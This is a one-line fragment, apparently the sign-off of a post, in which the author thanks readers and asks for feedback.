 Feedback is greatly appreciated! Thank you.